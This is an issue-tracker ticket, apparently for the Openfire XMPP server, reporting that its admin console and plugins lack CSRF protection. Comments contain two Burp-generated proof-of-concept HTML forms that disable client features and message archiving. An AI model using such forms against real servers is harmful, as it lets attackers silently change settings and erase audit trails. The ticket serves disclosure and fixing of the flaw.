We're updating the issue view to help you get more done. 

Admin Console Cross Site Request Forgery (CSRF) Vulnerability

Description

Originally, this ticket related to a CSRF vulnerability in the admin console reported by Sven Tantau (see Ignite Forum URL) which referenced the now defunct site [httx://1337day.com/exploits/21338]. This ticket has been updated with more recent info from hyp3rlinx.

Vulnerability Details:
No CSRF token exists within the Openfire Admin Console, which allows us to take malicious actions against the application from another form. Examples include:

  1. Changing the admin password

  2. Adding arbitrary users to the system

  3. Editing server settings e.g. turning SSL off

  4. Adding rogue malicious clients with permit access (e.g. allow all XMPP clients to connect)
    and more...

Exploit Code(s) / Full Details:
https://packetstormsecurity.com/files/133554/Openfire-3.10.2-Cross-Site-Request-Forgery.html

Environment

None

Acceptance Test - Entry

None

Activity

Show:
Simon Waters
December 16, 2016, 12:26 PM
Simon Waters
December 16, 2016, 2:14 PM

Ah, Dave clarified for audit-policy the update fails, but the values shown are in the request.

Simon Waters
December 16, 2016, 2:15 PM

Client Control also has CSRF on features.

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/clientcontrol/client-features.jsp" method="POST">
<input type="hidden" name="accountsEnabled" value="false" />
<input type="hidden" name="addcontactsEnabled" value="false" />
<input type="hidden" name="addgroupsEnabled" value="false" />
<input type="hidden" name="advancedEnabled" value="false" />
<input type="hidden" name="avatarsEnabled" value="false" />
<input type="hidden" name="broadcastEnabled" value="false" />
<input type="hidden" name="removalsEnabled" value="false" />
<input type="hidden" name="renamesEnabled" value="false" />
<input type="hidden" name="transferEnabled" value="false" />
<input type="hidden" name="helpforumsEnabled" value="false" />
<input type="hidden" name="helpuserguideEnabled" value="false" />
<input type="hidden" name="historyEnabled" value="false" />
<input type="hidden" name="hostnameEnabled" value="false" />
<input type="hidden" name="invisibleloginEnabled" value="false" />
<input type="hidden" name="logoutexitEnabled" value="false" />
<input type="hidden" name="movecopyEnabled" value="false" />
<input type="hidden" name="passwordchangeEnabled" value="false" />
<input type="hidden" name="personsearchEnabled" value="false" />
<input type="hidden" name="pluginsEnabled" value="false" />
<input type="hidden" name="preferencesEnabled" value="false" />
<input type="hidden" name="presenceEnabled" value="false" />
<input type="hidden" name="vcardEnabled" value="false" />
<input type="hidden" name="savepassandautologinEnabled" value="false" />
<input type="hidden" name="updatesEnabled" value="false" />
<input type="hidden" name="viewnotesEnabled" value="false" />
<input type="hidden" name="viewtasklistEnabled" value="false" />
<input type="hidden" name="submit" value="Save&#32;Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Simon Waters
December 16, 2016, 2:23 PM

/plugins/monitoring/archiving-settings.jsp has no CSRF

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/monitoring/archiving-settings.jsp" method="POST">
<input type="hidden" name="roomArchiving" value="off" />
<input type="hidden" name="maxTime" value="0" />
<input type="hidden" name="messageArchiving" value="off" />
<input type="hidden" name="maxAge" value="1" />
<input type="hidden" name="cancel" value="Cancel" />
<input type="hidden" name="idleTime" value="0" />
<input type="hidden" name="metadataArchiving" value="off" />
<input type="hidden" name="maxRetrievable" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Simon Waters
December 16, 2016, 2:38 PM

/server-db-stats.jsp can be disabled by URL, this would be rather a lame hack. Or the collected stats cleared, also lame.

Assignee

Dave Cridland

Reporter

wroot

Labels

Expected Effort

Medium

Ignite Forum URL

None

Components

Fix versions

Affects versions

Priority

Major
Configure